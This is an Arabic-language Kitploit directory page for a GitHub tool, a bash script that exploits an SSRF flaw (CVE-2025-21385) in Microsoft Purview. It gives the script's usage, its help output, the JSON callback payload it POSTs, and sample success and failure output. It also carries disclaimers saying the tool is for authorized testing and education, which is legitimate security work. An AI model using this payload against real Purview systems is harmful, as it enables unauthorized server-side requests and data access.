Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-21385 — ثغرة SSRF في Microsoft Purview | Kitploit
أدوات/GitHubGitHub/pauloxc6/cve-2025-21385
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubpauloxc6/cve-2025-21385

CVE-2025-21385

ثغرة SSRF في Microsoft Purview

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

سكربت استغلال ثغرة SSRF

يحتوي هذا المستودع على سكربت مصمم لاستغلال ثغرة SSRF (Server-Side Request Forgery) لأغراض الاختبار والتعليم. استخدم هذه الأداة بمسؤولية وفقط في البيئات التي لديك إذن صريح بها.

الميزات

  • استغلال ثغرات SSRF في الأنظمة المستهدفة.
  • التحقق من صحة عناوين URL المدخلة لتجنب إساءة الاستخدام.
  • واجهة سطر أوامر سهلة الاستخدام مع رسائل خطأ واضحة وقائمة تعليمات.

المتطلبات

  • bash (شل يونكس)
  • jq (معالج JSON)
  • curl (أداة سطر أوامر لطلبات HTTP)

الاستخدام

الصيغة

root@kitploit:~
./script.sh --exploit <target_url> <purview_url>

الخيارات

تنزيل الأداة
الخيارالوصف
-h, --helpعرض قائمة التعليمات.
--exploit tu puتنفيذ استغلال SSRF باستخدام عنوان URL الهدف وعنوان URL النطاق.

أمثلة

عرض قائمة التعليمات

root@kitploit:~
./script.sh -h

Output:

root@kitploit:~
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs

تنفيذ استغلال SSRF

root@kitploit:~
./script.sh --exploit http://example.com http://purview-url.com

المخرجات المتوقعة:

  • في حالة النجاح:
    root@kitploit:~
    SSRF exploit successful! Data retrieved:
    <response data>
    
  • في حالة الفشل:
    root@kitploit:~
    SSRF exploit failed! HTTP code: <code>
    

سير عمل السكربت

  1. يقوم السكربت بتحليل الوسائط المقدمة.
  2. التحقق من صحة عناوين URL المقدمة.
  3. إرسال طلب HTTP POST مع حمولة JSON إلى purview_url، في محاولة لاستغلال ثغرة SSRF.
  4. طباعة استجابة HTTP أو رسالة خطأ بناءً على النتيجة.

مثال على سير العمل

الإدخال

root@kitploit:~
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com

الحمولة المرسلة

root@kitploit:~
{
  "callback": "http://callback-url.com"
}

معالجة الاستجابة

يتم حفظ رمز استجابة HTTP ونصها، وبناءً على رمز الحالة، يتم تحديد نجاح أو فشل الاستغلال.

معالجة الأخطاء

  • إذا تم اكتشاف وسائط غير صالحة أو مفقودة، يوفر السكربت تعليمات مفصلة عبر قائمة التعليمات.
  • إذا كانت عناوين URL غير صالحة، يتم عرض رسالة خطأ ويتوقف التنفيذ.

ملاحظات التطوير

هذا السكربت لأغراض الاختبار فقط. إساءة استخدام هذا السكربت قد تؤدي إلى عواقب قانونية وخيمة. تأكد من الامتثال لجميع القوانين والمعايير الأخلاقية المعمول بها.

المساهمة

لا تتردد في المساهمة عن طريق إنشاء طلبات سحب أو الإبلاغ عن المشكلات.

الترخيص

GNU GPL v3


إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.